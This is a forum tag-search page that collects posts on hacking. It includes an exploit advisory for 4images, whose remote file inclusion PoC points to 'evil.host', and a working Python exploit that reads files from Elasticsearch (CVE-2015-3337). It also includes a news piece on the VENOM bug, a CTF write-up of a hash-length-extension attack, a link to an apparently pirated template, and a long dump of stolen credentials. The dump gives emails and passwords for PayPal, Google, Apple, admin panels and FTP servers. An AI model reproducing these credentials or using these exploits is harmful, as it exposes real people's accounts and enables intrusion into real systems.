Search the Community
Showing results for tags 'host'.
-
| # Title : 4images 1.7.11 Multi Vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Dork : Powered by 4images 1.7.11 | # Tested on: windows 8.1 Français V.(Pro) | # Download : http://www.4homepages.de/ ======================================= Host Header Attack : Vulnerability description : An attacker can manipulate the Host header as seen by the web application and cause the application to behave in unexpected ways. Developers often resort to the exceedingly untrustworthy HTTP Host header (_SERVER["HTTP_HOST"] in PHP). Even otherwise-secure applications trust this value enough to write it to the page without HTML-encoding it with code equivalent to: <link href="http://_SERVER['HOST']" This vulnerability affects /4images/index.php. Host header evilhostKdK2IXPv.com was reflected inside a LINK tag (href attribute). Poc : http://127.0.0.1/4images/top.php/lightbox.php R/L File inclusion : C:\web\www\4images\global.php LIne 400 : include_once(ROOT_PATH.'includes/db_'.strtolower($db_servertype).'.php'); Function : include_once Variables : $db_servertype Poc : 127.0.0.1/4images/global.php?db_servertype=http://evil.host Greetz : jericho http://attrition.org & http://www.osvdb.org/ * packetstormsecurity.com * http://is-sec.org/cc/ Hussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be * exploit4arab.net --------------------------------------------------------------------------------------------------------------- Source
-
Premium WHMCS Template Ready Host Version 5.3.14 Demo : http://clive.pe.hu/ Link download : https://app.box.com/s/e3kifeztqebirz3e52dnvhow3w8n2qwg
-
There's an extremely critical bug in the Xen, KVM, and native QEMU virtual machine platforms and appliances that makes it possible for attackers to break out of protected guest environments and take full control of the operating system hosting them, security researchers warned Wednesday. The vulnerability is serious because it pierces a key protection that many cloud service providers use to segregate one customer's data from another's. If attackers with access to one virtualized environment can escape to the underlying operating system, they could potentially access all other virtual environments. In the process, they would be undermining one of the fundamental guarantees of virtual machines. Compounding the severity, the vulnerability resides in a low-level disk controller, allowing it to be exploited when guest or host OSes alike run Linux, Windows, Mac OS X, or possibly other OSes. Researchers from security firm CrowdStrike, who first warned of the vulnerability, wrote: The vulnerability is the result of a buffer-overflow bug in QEMU's virtual Floppy Disk Controller, which is used in a variety of virtualization platforms and appliances. It is known to affect Xen, KVM, and the native QEMU client software, and it may affect others. VMware, Microsoft Hyper-V, and Bochs hypervisors are not affected. At publication time, patches were available from the Xen Project and the QEMU Project. RedHat has a patch here. There are also workarounds users can follow to lessen the risk of exploitation. The vulnerability is serious enough that users of other virtualization packages should immediately contact the developers to find out if they're susceptible. The bug has existed since 2004. There's no indication that the vulnerability is being actively exploited maliciously in the wild. Although the vulnerability is agnostic of the OS running both the guest and host, attack code exploiting the bug must have administrative or root privileges to the guest. The threat is greatest for people who rely on virtual private servers, which allow service providers to host multiple operating systems on a single physical server. Because virtual servers are often provided to different customers, it's common that they have administrative or root privileges to that guest OS that could be used to take over the underlying machine. CrowdStrike's advisory went on to state: For those who are unable to patch vulnerable software, CrowdStrike offered the following: The vulnerability has been dubbed Venom, short for virtualized environment neglected operations manipulation. Some people are already comparing its severity to Heartbleed, the catastrophic bug disclosed in April 2014 that exposed private cryptography keys, end-user passwords, and other sensitive data belonging to countless services that used the OpenSSL crypto library. At this early stage, it's too early to know if the comparison to Heartbleed is exaggerated, since at the moment there's no indication that Venom is being actively exploited. Tod Beardsley, a research manager at vulnerability assessment provider Rapid7, has indicated that the threat from Venom is likely not as serious. In an e-mailed statement, he wrote: Those limitations aside, there's an extremely broad range of platforms that are vulnerable to this exploit, and those platforms house servers used by banks, e-commerce providers, and countless other sensitive services. Given the large number of servers that are vulnerable and the extremely high value of the assets they contain, this security bug should be considered a top priority. Source
-
#!/usr/bin/python # Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign # Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5 # Pedro Andujar || twitter: pandujar || email: @digitalsec.net # Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/ import socket, sys print "!dSR ElasticPwn - for CVE-2015-3337\n" if len(sys.argv) <> 3: print "Ex: %s [url]www.example.com[/url] /etc/passwd" % sys.argv[0] sys.exit() port = 9200 # Default ES http port host = sys.argv[1] fpath = sys.argv[2] def grab(plugin): socket.setdefaulttimeout(3) s = socket.socket() s.connect((host,port)) s.send("GET /_plugin/"+plugin+"/../../../../../.."+fpath+ " HTTP/1.0\n" "Host: "+host+"\n\n") file = s.recv(2048) print " [*] Trying to retrieve "+str(fpath)+":" if ("HTTP/1.0 200 OK" in file): print "\n"+file else: print "[-] File Not Found or system not vulnerable" def pfind(plugin): try: socket.setdefaulttimeout(3) s = socket.socket() s.connect((host,port)) s.send("GET /_plugin/"+plugin+"/ HTTP/1.0\n" "Host: "+host+"\n\n") file = s.recv(16) print "[*] Trying to find plugin "+plugin+":" if ("HTTP/1.0 200 OK" in file): print "[+] Plugin found!" grab(plugin) sys.exit() else: print "[-] Not Found " except Exception, e: print "[-] Error connecting to "+host+" "+str(e) sys.exit() # Include more plugin names to check if they are installed pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head'] for plugin in pluginList: pfind(plugin) Source
-
As many of you know, last weekend was Ghost in the Shellcode 2015! There were plenty of fun challenges, and as always I had a great time competing! This will be my first of four writeups, and will be pretty simple (since it simply required me to use a tool that already exists (and that I wrote) The level was called "knockers". It's a simple python script that listens on an IPv6 UDP port and, if it gets an appropriately signed request, opens one or more other ports. The specific challenge gave you a signed token to open port 80, and challenged you to open up port 7175. The service itself listened on port 8008 ("BOOB", to go with the "knockers" name). You can download the original level here (Python). # python2 pleaseimport sys import struct import hashlib import os from binascii import hexlify, unhexlify import SocketServer import socket try: from fw import allow except ImportError: def allow(ip,port): print 'allowing host ' + ip + ' on port ' + str(port) PORT = 8008 g_h = hashlib.sha512 g_key = None def generate_token(h, k, *pl): m = struct.pack('!'+'H'*len(pl), *pl) mac = h(k+m).digest() return mac + m def parse_and_verify(h, k, m): ds = h().digest_size if len(m) < ds: return None mac = m[:ds] msg = m[ds:] if h(k+msg).digest() != mac: return None port_list = [] for i in range(0,len(msg),2): if i+1 >= len(msg): break port_list.append(struct.unpack_from('!H', msg, i)[0]) return port_list class KnockersRequestHandler(SocketServer.BaseRequestHandler): def handle(self): global g_key data, s = self.request print 'Client: {} len {}'.format(self.client_address[0],len(data)) l = parse_and_verify(g_h, g_key, data) if l is None: print 'bad message' else: for p in l: allow(self.client_address[0], p) class KnockersServer(SocketServer.UDPServer): address_family = socket.AF_INET6 def load_key(): global g_key f=open('secret.txt','rb') g_key = unhexlify(f.read()) f.close() def main(): global g_h global g_key g_h = hashlib.sha512 if len(sys.argv) < 2: print '''Usage: --- Server --- knockers.py setup Generates a new secret.txt knockers.py newtoken port [port [port ...]] Generates a client token for the given ports knockers.py serve Runs the service --- Client --- knockers.py knock <host> <token> Tells the server to unlock ports allowed by the given token ''' elif sys.argv[1]=='serve': load_key() server = KnockersServer(('', PORT), KnockersRequestHandler) server.serve_forever(); elif sys.argv[1]=='setup': f = open('secret.txt','wb') f.write(hexlify(os.urandom(16))) f.close() print 'wrote new secret.txt' elif sys.argv[1]=='newtoken': load_key() ports = map(int,sys.argv[2:]) print hexlify(generate_token(g_h, g_key, *ports)) elif sys.argv[1]=='knock': ai = socket.getaddrinfo(sys.argv[2],PORT,socket.AF_INET6,socket.SOCK_DGRAM) if len(ai) < 1: print 'could not find address: ' + sys.argv[2] return family, socktype, proto, canonname, sockaddr = ai[0] s = socket.socket(family, socktype, proto) s.sendto(unhexlify(sys.argv[3]), sockaddr) else: print 'unrecognized command' if __name__ == '__main__': main() The vulnerability To track down the vulnerability, let's have a look at the signature algorithm: def generate_token(h, k, *pl): m = struct.pack('!'+'H'*len(pl), *pl) mac = h(k+m).digest() return mac + m In that function, h is a hash function (sha-512, specifically), k is a random 16-byte token, randomly generated, and m is an array of 16-bit representation of the ports that the user wishes to open. So if the user wanted to open port 1 and 2, they'd send "\x00\x01\x00\x02", along with the appropriate token (which the server administrator would have to create/send, see below). Hmm... it's generating a mac-protected token and string by concatenating strings and hashing them? If you've followed my blog, this might sound very familiar! This is a pure hash extension vulnerability! I'm not going to re-iterate what a hash extension vulnerability is in great detail—if you're interested, check out the blog I just linked—but the general idea is that if you generate a message in the form of msg + H(secret + msg), the user can arbitrarily extend the message and generate a new signature! That means if we have access to any port, we have access to every port! Let's see how! Generating a legit token To use the python script linked above, first run 'setup': $ python ./knockers.py setup wrote new secret.txt Which generates a new secret. The secret is just a 16-byte random string that's stored on the server. We don't really need to know what the secret is, but for the curious, if you want to follow along and verify your numbers against mine, it's: $ cat secret.txt 2b396fb91a76307ce31ef7236e7fd3df Now we use the tool (on the same host as the secret.txt file) to generate a token that allows access on port 80: $ python ./knockers.py newtoken 80 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb20050 Notice the first 512 bits (64 bytes) is the signature—which is logical, since it's sha512—and the last 16 bits (2 bytes) are 0050, which is the hex representation of 80. We'll split those apart later, when we run hash_extender, but for now let's make sure the token actually works first! We start the server: $ python ./knockers.py serve And in another window, or on another host if you prefer, send the generated token: $ python ./knockers.py knock localhost 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb20050 In the original window, you'll see that it was successful: $ python ./knockers.py serve Client: ::1 len 66 allowing host ::1 on port 80 Now, let's figure out how to create a token for port 7175! Generating an illegit (non-legit?) token So this is actually the easiest part. It turns out that the awesome guy who wrote hash_extender (just kidding, he's not awesome) built in everything you needed for this attack! Download and compile hash_extender if needed (definitely works on Linux, but I haven't tested on any other platforms—testers are welcome!), and run it with no arguments to get the help dump. You need to pass in the original data (that's "\x00\x80"), the data you want to append (7175 => "\x1c\x07"), the original signature, and the length of the secret (which is 16 bytes). You also need to pass in the types for each of the parameters ("hex") in case the defaults don't match (in this case, they don't—the appended data is assumed to be raw). All said and done, here's the command: ./hash_extender --data-format hex --data 0050 \ --signature-format hex --signature 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb2 \ --append "1c07" --append-format hex \ -l 16 You can pass in the algorithm and the desired output format as well, if we don't, it'll just output in every 512-bit-sized hash type. The output defaults to hex, so we're happy with that. $ ./hash_extender --data-format hex --data 0050 --signature-format hex --signature 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb2 --append "1c07" --append-format hex -l 16 Type: sha512 Secret length: 16 New signature: 4bda887c0fc43636f39ff38be6d592c2830723197b93174b04d0115d28f0d5e4df650f7c48d64f7ca26ef94c3387f0ca3bf606184c4524600557c7de36f1d894 New string: 005080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07 [strike] Type: whirlpool Secret length: 16 New signature: f4440caa0da933ed497b3af8088cb78c49374853773435321c7f03730386513912fb7b165121c9d5fb0cb2b8a5958176c4abec35034c2041315bf064de26a659 New string: 0050800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07[/strike] Ignoring the whirlpool token, since that's the wrong algorithm, we now have a new signature and a new string. We can just concatenate them together and use the built-in client to use them: $ python ./knockers.py knock localhost 4bda887c0fc43636f39ff38be6d592c2830723197b93174b04d0115d28f0d5e4df650f7c48d64f7ca26ef94c3387f0ca3bf606184c4524600557c7de36f1d894005080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07 And checking our server, we see a ton of output, including successfully opening port 7175: $ python ./knockers.py serve Client: ::1 len 66 allowing host ::1 on port 80 Client: ::1 len 178 allowing host ::1 on port 80 allowing host ::1 on port 32768 allowing host ::1 on port 0 allowing host ::1 on port 0 [...repeated like 100 times...] allowing host ::1 on port 0 allowing host ::1 on port 0 allowing host ::1 on port 144 allowing host ::1 on port 7175 And that's it! At that point, you can visit http://knockers.2015.ghostintheshellcode.com:7175 and get the key. Source skullsecurity
-
Application: Google Chrome Host: https://www.dyndn.es/ Username: Fastnet@walla.com Password: Ratte113 Application: Google Chrome Host: https://www.dropbox.com/de/ Username: fastnet112@googlemail.com Password: Ratte112 Application: Google Chrome Host: http://192.168.100.2...namic_DNS.shtml Username: fastnet@walla.com Password: Ratte113 Application: Google Chrome Host: https://crytecsbs.local/Remote/logon Username: fastnet Password: Ratte112 Application: Google Chrome Host: https://accounts.goo...om/ServiceLogin Username: fastnet112@googlemail.com Password: Melissa78 Application: Google Chrome Host: https://192.168.100....ebman/index.cgi Username: admin Password: ratte112 Application: Google Chrome Host: https://192.168.100..../administrator/ Username: admin Password: 663852 Application: Google Chrome Host: https://192.168.100.140/Remote/logon Username: fastnet Password: Ratte112 Application: Google Chrome Host: http://www.iapphacks.com/ucp.php Username: Ratte112 Password: ratte112 Application: Google Chrome Host: https://www.dyndn.es/ Username: fastnet Password: Ratte113 Application: Google Chrome Host: https://tipido.com/g...space-anmelden/ Username: Fastnet@walla.com Password: Somm3r2013 Application: Google Chrome Host: http://www.lima-city.de/login Username: vipx Password: Somm3r2013 Application: Google Chrome Host: https://myds.synolog...rt/register.php Username: Fastnet@walla.com Password: Ratte113 Application: Google Chrome Host: http://www.x.gg/login Username: Fastnet@walla.com Password: YYCUvqEl Application: Google Chrome Host: http://85.214.72.143/fastnet/ Username: fastnet Password: hund88 Application: Google Chrome Host: https://www.facebook.com/login.php Username: Fastnet@walla.com Password: Melissa78+ Application: Google Chrome Host: http://vipx.square7.ch/administrator/ Username: admin Password: Somm3r2013 Application: Google Chrome Host: https://accounts.goo...om/ServiceLogin Username: Fastnet112@googlemail.com Password: Melissa78 Application: Google Chrome Host: https://warframe.com/signup Username: Fastnet Password: monster112 Application: Google Chrome Host: http://phpmyadmin.vi...e7.ch/index.php Username: vipx Password: vipx Application: Google Chrome Host: https://friends.walla.co.il/ Username: Fastnet Password: Ratte112 Application: Google Chrome Host: https://myds.synolog...ter_account.php Username: Fastnet@walla.com Password: 87654321 Application: Google Chrome Host: https://battlelog.ba...bf3/de/servers/ Username: Fastnet112@googlemail.com Password: Ratte112 Application: Google Chrome Host: http://192.168.100.1...admin/index.php Username: root Password: ratte112 Application: Google Chrome Host: http://battlelog.bat...om/all/de/gate/ Username: fastnet112@googlemail.com Password: Ratte112 Application: Google Chrome Host: https://www.amazon.de/ap/signin Username: antjemy@web.de Password: skellerup Application: Google Chrome Host: https://www.starstab...om/de/myaccount Username: antjemy@web.de Password: lotta1409 ========================== ate/Time: 23.01.2015 09:28:54 PC Name: CHRIS-THINK Windows Version: Windows 7 / Vista Application: FileZilla Host: iface.ff.lan Port: 22 Username: root Password: isitaplane Application: Google Chrome Host: http://helpdesk.blue...hilfe-anfordern Username: domi Password: domi Application: Google Chrome Host: http://www.grupo-max.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://test2.bluepoi.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.joomlart....s/downloads.php Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://test.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://osclass.bluep...admin/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.geco-group.com/de-home Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: https://my.world4you.com/index.php Username: 50120485 Password: p9qk9g Application: Google Chrome Host: http://www.joomlacon...r.net/index.php Username: chrioll Password: Sarese12! Application: Google Chrome Host: https://webmail.world4you.com/ Username: info@florianueberall.at Password: florian! Application: Google Chrome Host: http://omcme.forumotion.com/login Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://www.4freelance.de/login Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: https://crowdin.net/login Username: chrioll Password: sARESE!"1 Application: Google Chrome Host: http://goomaxx-vorsc...rator/index.php Username: cburger Password: Sarese12! Application: Google Chrome Host: https://adobeid-na1....der/pages/login Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://yeslider.com/...rator/index.php Username: demo Password: demo Application: Google Chrome Host: http://localhost:8000/admin/ Username: chrioll Password: chrioll Application: Google Chrome Host: http://www.fonts.com...eb-fonts/google Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.guia-acti...rator/index.php Username: cburger Password: Sarese12! Application: Google Chrome Host: http://www.boerse.bz...ung-2013-a.html Username: chrioll Password: lz639ad Application: Google Chrome Host: http://www.highlands.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: https://kuler.adobe....te/color-wheel/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.gmop.de/administrator/ Username: cburger Password: Chris,123 Application: Google Chrome Host: http://hsv1.bluepoin...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.kareebu.com/login Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://192.168.178.3...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://goomaxx-vorsc...e/single-advert Username: demo Password: demo Application: Google Chrome Host: http://www.tutorials...007-vba.281799/ Username: chrioll Password: mco727865 Application: Google Chrome Host: https://www.strato.d...CustomerService Username: 73382697 Password: oliver3977lukas Application: Google Chrome Host: https://twitter.com/...word_reset_sent Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://support.bluep...t/scp/login.php Username: chris Password: Sarese12! Application: Google Chrome Host: http://81.169.222.36/ Username: gmdev Password: Ir6k7OiZDo/+ Application: Google Chrome Host: https://registrierun...Eukm2_q-GA_RGfc Username: grupomaximus Password: 8d16d57a3 Application: Google Chrome Host: http://seblod.time4m.../anmeldung.html Username: chrioll.b Password: Sarese12! Application: Google Chrome Host: http://www.ms-office.../showthread.php Username: chrioll Password: mco727865 Application: Google Chrome Host: http://www.panosfx.com/log-in/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://portal.bony-club.eu/ Username: cburger Password: malaga Application: Google Chrome Host: http://mygully.com/t...enbuch-1825176/ Username: chrioll Password: mco727865 Application: Google Chrome Host: https://e16927-phpmy...es.easyname.eu/ Username: u9400db4 Password: GTtuENK Application: Google Chrome Host: http://i18n.osticket.com/join Username: chrioll Password: sARESE!"1 Application: Google Chrome Host: http://saenger.bluep.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://goomaxx1.blue...ass/install.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://ff.loc/scrum/ Username: luigi Password: mco727865 Application: Google Chrome Host: https://my.easyname.com/de/anmelden Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.guia-culi...rator/index.php Username: cburger Password: Sarese12! Application: Google Chrome Host: http://demo.magnolia...ia/admincentral Username: superuser Password: superuser Application: Google Chrome Host: http://www.bony-club.eu/administrator/ Username: cburger Password: Sarese12! Application: Google Chrome Host: https://www.strato.d...CustomerService Username: office Password: hitman47 Application: Google Chrome Host: http://sales.grupo-maximus.eu/ Username: office Password: romulus2014top Application: Google Chrome Host: https://app.asana.co...9605339434404/f Username: it-chris@grupo-maximus.eu Password: Sarese12! Application: Google Chrome Host: https://edit.yahoo.com/upgrade Username: chrioll65 Password: Sarese12! Application: Google Chrome Host: http://www.grupo-maximus.eu/ Username: cburger Password: malaga Application: Google Chrome Host: http://quirktools.com/me/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: https://www.template...za.com/register Username: chrioll Password: Sarese12! Application: Google Chrome Host: https://rubygems.org/sign_up Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://verein.bluepo...ogram/index.php Username: admin Password: lz639ad Application: Google Chrome Host: ftp://e16927-ftp.services.easyname.eu/ Username: 9400ftp16 Password: Adrian,123 Application: Google Chrome Host: http://www.goomaxx.eu/administrator/ Username: cburger Password: Sarese12! Application: Google Chrome Host: http://verwaltung.bl...int-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://bony.bluepoint-service.at/ Username: grupomaximus Password: klausi Application: Google Chrome Host: https://it.projektwe...7tfgcjm2hxn7rcd Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: http://test.bluepoin...index.php/login Username: admin Password: Sarese12! Application: Google Chrome Host: http://office.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://verein.bluepo...profile_new.php Username: christian Password: Sarese12! Application: Google Chrome Host: https://grupomaximus...cloudforge.com/ Username: cburger1 Password: Sarese12! Application: Google Chrome Host: https://eu.battle.ne...eation/tos.html Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://helpdesk.blue...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: https://app.cloudforge.com/session/new Username: cburger1 Password: Sarese12! Application: Google Chrome Host: http://osclass.bluep...ass/install.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://localhost/ Username: grupomaximus Password: klausi Application: Google Chrome Host: http://www.klagusch-.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://81.169.222.63/ Username: gmdev Password: Ir6k7OiZDo/+ Application: Google Chrome Host: https://www.adobe.co...n.exchange.html Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://demo.f4s.eu/w...ce/content/demo Username: chris-it@grupo-maximus.eu Password: Sarese12! Application: Google Chrome Host: ftp://192.168.178.36/ Username: chrioll Password: chrioll Application: Google Chrome Host: https://servisto.de/...demo/login.html Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://owncloud.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: https://twitter.com/oauth/authenticate Username: chrioll@gmail.com Password: mco727865 Application: Google Chrome Host: http://couponlisting...php/all-coupons Username: demo Password: demo Application: Google Chrome Host: https://www.xing.com...istian_Burger36 Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: https://www.amazon.de/ap/signin Username: office@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: https://www.strato.d...CustomerService Username: 73459150 Password: hitman47 Application: Google Chrome Host: http://forum.admidio.org/ucp.php Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://pligg.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.geco-grou.../web/guest/home Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: http://www.imapbuild...n/index-rc1.php Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.joomlackeditor.com/register Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.admidio.org/forum/ucp.php Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://www.schiessen-lienz.at/ Username: admin Password: glockat Application: Google Chrome Host: http://goomaxx-vorsc...n/single-advert Username: demo Password: demo Application: Google Chrome Host: http://www.dolomiten...at/wp-login.php Username: griasenk Password: Sarese12! Application: Google Chrome Host: http://www.joomlaportal.de/login.php Username: chrioll Password: mco727865 Application: Google Chrome Host: http://hsv1.bluepoin...rator/index.php Username: author Password: author Application: Google Chrome Host: http://test2.bluepoi...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: https://adobeid-na1..../create_account Username: chris@formfinder.at Password: Sarese12! Application: Google Chrome Host: http://www.bony-club.eu/ Username: cburger Password: malaga Application: Google Chrome Host: http://goomaxx-vorsc....php/en/logout1 Username: cburger Password: Sarese12! Application: Google Chrome Host: http://85.214.78.91/ Username: cburger Password: malaga Application: Google Chrome Host: http://new.wasser-re.../administrator/ Username: admin Password: tempor Application: Google Chrome Host: http://office.bluepoint-service.at/ Username: chris Password: Sarese12! Application: Google Chrome Host: http://192.168.1.1/ Username: admin Password: admin Application: Google Chrome Host: http://81.169.221.205/redmine/login Username: cburger Password: Sarese12!? Application: Google Chrome Host: http://ff.loc/scrum/index.php Username: chris Password: Sarese12! Application: Google Chrome Host: https://boerse.to/th...xisbuch.389380/ Username: chrisburg Password: O8-s5Q31 Application: Google Chrome Host: https://www.evernote.com/Login.action Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.boerse.bz/ Username: chrioll Password: lz639ad Application: Google Chrome Host: http://goomaxx-vorsc...omponent/users/ Username: cburger Password: Sarese12! Application: Google Chrome Host: http://www.seblod.com/index.php Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://www.bang2joom.com/plan/login Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://demo.owncloud.org/ Username: test Password: test Application: Google Chrome Host: http://activos-vorsc.../administrator/ Username: cburger Password: Sarese12! Application: Google Chrome Host: http://verein.bluepo...ystem/login.php Username: admin Password: lz639ad Application: Google Chrome Host: http://office.bluepoint-service.at/ Username: andreas Password: Glock19! Application: Google Chrome Host: http://goomaxx.bluep...admin/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: https://github.com/session Username: chrioll Password: Sarese12! Application: Google Chrome Host: https://accounts.goo...om/ServiceLogin Username: chriollweb@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.pasha-rea...rator/index.php Username: heico Password: hitman47 Application: Google Chrome Host: https://webmail.easyname.eu/ Username: 9400mail6 Password: Sarese12! Application: Google Chrome Host: http://pastebin.com/signup Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.w-b-s.net/ Username: cburger Password: Sarese12! Application: Google Chrome Host: http://demo.foobla.c.../administrator/ Username: demo Password: demo Application: Google Chrome Host: https://www.dropbox.com/login Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://goomaxx-vorsc.../administrator/ Username: cburger Password: Sarese12! Application: Google Chrome Host: https://www.share-on....biz/user/login Username: 08088816435 Password: UqMsD3Fmb Application: Google Chrome Host: https://www.share-on...egister/premium Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://www.w-b-s.net.../wiki/index.php Username: cburger Password: chris2014 Application: Google Chrome Host: http://localhost/joomla/administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.goomaxx.eu/ Username: cburger Password: malaga Application: Google Chrome Host: http://ordasoft.com/ Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://owncloud.blue...ce.at/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: https://communicator....de/ox6/ox.html Username: chris-it@grupo-maximus.eu Password: Sarese12! Application: Google Chrome Host: https://idmsa.apple....Auth/login.html Username: chrioll65@me.com Password: Sarese12! Application: Google Chrome Host: http://office.bluepo...ce.at/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://joomla35.ijoo...x.php/ad-agency Username: demo Password: demo Application: Google Chrome Host: http://www.nauticexp...096-216658.html Username: chris@wasser-rettung.net Password: Sarese12! Application: Google Chrome Host: http://wiki.bluepoin...ce.at/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://forums.osclass.org/register2/ Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: https://www.addthis.com/register Username: christian.burger@grupo-maximus.eu Password: Sarese12! Application: Google Chrome Host: http://www.guia-culinaria.eu/ Username: cburger Password: malaga Application: Google Chrome Host: https://app.cloudfor...vitations/30847 Username: Burger Password: Sarese12! Application: Google Chrome Host: https://accounts.goo...om/ServiceLogin Username: maximusgoomaxx@gmail.com Password: KZbDcf3G Application: Google Chrome Host: http://goomaxx-vorsc...n/single-advert Username: demo Password: demo Application: Google Chrome Host: http://introduction....ypo3.org/typo3/ Username: admin Password: password Application: Google Chrome Host: https://www.paypal.c...ebapps/mpp/home Username: christian.burger@grupo-maximus.eu Password: Sarese12! Application: Google Chrome Host: http://localhost/phpmyadmin/ Username: root Password: chrioll Application: Google Chrome Host: https://accounts.goo...om/ServiceLogin Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://localhost/hosting/login.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://localhost/gottl/administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://front.bluepoi...ce.at/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: https://accounts.goo...om/ServiceLogin Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://81.169.222.63/dbadmintool/ Username: grupo_maximus Password: 6Grewq7er Application: Google Chrome Host: https://communicator...com/ox6/ox.html Username: chris-it@grupo-maximus.eu Password: Sarese12! Application: Google Chrome Host: https://www.deviantart.com/join/ Username: chrioll Password: mco727865 Application: Google Chrome Host: https://www.xing.com/ Username: christian.b@bluepoint-service.at Password: Sarese12! Application: Google Chrome Host: http://81.169.222.63...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.pixelio.de/ Username: chrioll Password: mco727865 Application: Google Chrome Host: http://www.boerse.bz...ele/index5.html Username: chrioll Password: lz639ad Application: Google Chrome Host: http://hsv.bluepoint...rator/index.php Username: admin Password: Sarese12! Application: Google Chrome Host: http://cloud.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://verein.bluepo...login_check.php Username: admin Password: lz639ad Application: Google Chrome Host: https://www.dropbox.com/ Username: chrioll@me.com Password: Sarese12! Application: Google Chrome Host: http://elgg.bluepoint-service.at/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://www.bootply.com/UIc6GLkWrb Username: chrioll Password: Sarese12! Application: Google Chrome Host: http://data.formfinder.at/ Username: superadmin Password: 987KdaE2 Application: Google Chrome Host: http://www.faboba.com/component/uu/ Username: chrioll@gmail.com Password: Sarese12! Application: Google Chrome Host: http://www.schiessen...index.php/login Username: author Password: author Application: Google Chrome Host: http://hsv1.bluepoin...rator/index.php Username: hans Password: hansmoser Application: Google Chrome Host: http://www.bluepoint.../administrator/ Username: admin Password: Sarese12! Application: Google Chrome Host: http://demo.kandanda.../administrator/ Username: demo Password: demo 